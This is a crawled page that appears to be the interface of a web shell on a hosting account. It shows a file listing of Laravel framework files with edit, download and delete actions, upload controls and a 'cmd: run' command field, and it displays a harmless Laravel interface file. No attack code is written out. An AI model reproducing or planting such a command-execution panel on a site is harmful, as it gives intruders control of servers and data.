/
home
/
techb158
/
immovalet.com
/
vendor
/
laravel
/
framework
/
src
/
Illuminate
/
Contracts
/
View
/
/home/techb158/immovalet.com/vendor/laravel/framework/src/Illuminate/Contracts/View
mkdir
upload
Name
Size
Mode
Actions
Engine.php
265
0644
edit
dl
rm
Factory.php
1933
0644
edit
dl
rm
View.php
541
0644
edit
dl
rm
Edit:
/home/techb158/immovalet.com/vendor/laravel/framework/src/Illuminate/Contracts/View/Engine.php
(265B)
<?php namespace Illuminate\Contracts\View; interface Engine { /** * Get the evaluated contents of the view. * * @param string $path * @param array $data * @return string */ public function get($path, array $data = []); }
Save
cmd:
run